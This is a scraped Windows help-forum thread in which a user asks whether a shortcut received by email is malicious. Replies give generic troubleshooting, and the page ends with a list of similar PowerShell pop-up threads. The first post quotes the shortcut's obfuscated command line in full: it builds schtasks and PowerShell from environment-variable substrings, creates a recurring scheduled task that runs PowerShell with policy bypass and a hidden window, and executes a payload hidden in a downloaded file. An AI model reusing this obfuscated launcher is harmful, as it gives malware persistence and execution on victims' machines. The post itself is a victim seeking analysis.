Windows 10: Powershell pops up after opening shortcut

Discus and support Powershell pops up after opening shortcut in AntiVirus, Firewalls and System Security to solve the problem; Hi, I just found that two computer have probably been infected by something after the owners opened a shortcut (downloaded from their email). This is... Discussion in 'AntiVirus, Firewalls and System Security' started by Daniele Buso, Aug 7, 2019.

1. Powershell pops up after opening shortcut

Hi, I just found that two computer have probably been infected by something after the owners opened a shortcut (downloaded from their email).

This is what the shortcut was pointing to:

%comspec% /c %os:~6,1%chta%os:~6,1%ks /F /Create /TN "GO" /sc minute /MO 2 /ST 06:21 /TR "pow%tmp:~5,3%hell -ep bypass -%os:~0,3% 1 -c '&{cd %userprofile%; $m=F%os:~1,3%STR /S FOREGROUND agosto*.* |%os:~6,1%elect -first 1;$m |iex}'"

I checked in the task scheduler but can't find anyting and after the clicked they reported a powershell terminal opening and immediately closing.

Is this script doing something malicious?

:)

Daniele Buso, Aug 7, 2019
  2. KeithM Win User

How to change the WinX menu, including Powershell/Powershell (Admin)

This part intrigues me. As suggested earler, please post a screenshot of the error message. Also, please clarify/test the follwoing:
    1. Can you start PowerShell from the Start Menu?
    2. If you navigate to %localappdata%\Microsoft\Windows\WinX\Group3, does PowerShell launch from the shortcuts there?
    3. If #1 works & #2 doesn't, compare (& post) the target text from each shortcuts properties. For the Start Menu shortcut, right-click & select Open file location to navigate to the Start Menu folder.

Keith

KeithM, Aug 7, 2019
  3. Drone Win User
    Drone, Aug 7, 2019
  4. Ariel Acu Win User

Powershell pops up after opening shortcut

Windows powershell randomly popping up.

Thank you for the update. Just to confirm, is Windows PowerShell shows up when turning on your device? If so, this could be due to creating a shortcut on startup folder. To know the list of items that runs when Windows started, we suggest that you check
    it in Task Manager > Startup. Check if Windows PowerShell is listed and enabled.

We would appreciate if you will send us a screenshot showing the startup tab on your Task manager to better assist you.

We look forward to your reply.

Ariel Acu, Aug 7, 2019
Thema:

Powershell pops up after opening shortcut

1. Powershell pops up after opening shortcut - Similar Threads - Powershell pops opening

2. Windows Powershell popping up randomly

in Windows 10 Software and Apps
    Windows Powershell popping up randomly: Hi, powershell opens up randomly and suddenly blends on background. After a minute, it's ram usage goes up from 50MBs to 1.1GB x 2 with multiple processes following up. I have created a crash dump .dmp file. %90 of my task scheduler events are disabled, all the services...
  3. Windows Powershell popping up randomly

in Windows 10 BSOD Crashes and Debugging
    Windows Powershell popping up randomly: Hi, powershell opens up randomly and suddenly blends on background. After a minute, it's ram usage goes up from 50MBs to 1.1GB x 2 with multiple processes following up. I have created a crash dump .dmp file. %90 of my task scheduler events are disabled, all the services...
  4. Windows PowerShell keeps popping up.

in Windows 10 Ask Insider
    Windows PowerShell keeps popping up.: Why does this happen? submitted by /u/JoyousCreeper [link] [comments] https://www.reddit.com/r/Windows10/comments/ubvb1x/windows_powershell_keeps_popping_up/
  5. Powershell constantly pops up

in Windows 10 Customization
    Powershell constantly pops up: When I close it, it opens back up few minutes later. When I don't, multiple of them open nonstop. Sometimes it opens then closes immediately. Scanned for viruses several times, none. Checked other solutions checking startup folders and on task manager, etc. Nothing is...
  6. Powershell constantly pops up

in Windows 10 Gaming
    Powershell constantly pops up: When I close it, it opens back up few minutes later. When I don't, multiple of them open nonstop. Sometimes it opens then closes immediately. Scanned for viruses several times, none. Checked other solutions checking startup folders and on task manager, etc. Nothing is...
  7. Powershell constantly pops up

8. Powershell pops up at startup

Powershell pops up at startup: Powershell window pops up on startup and has to be removed via task manager or timeout. It's disabled in the start menu and I cannot delete it. Some posts suggest this indicates a malware infection, but all scans are negative....
  9. PowerShell screen pops up

in Windows 10 Customization
    PowerShell screen pops up: PowerShell screen pops up when I log on. Takes 30 seconds to click it away. Another issue started at the same time. When I try to use a link it takes me to the Edge News page the first time I try. When I retry it gets me there. I shut PowerShell off. It did not work....
  10. Windows Powershell pop up?

in Windows 10 Support
    Windows Powershell pop up?: Have had this issue for a some months now but never bothered to report it since it was minor. Randomly, especially when in-game (it'll minimize each time), Powershell opens up. This happens incessantly from time to time. I try to close it but it takes a few seconds, and it...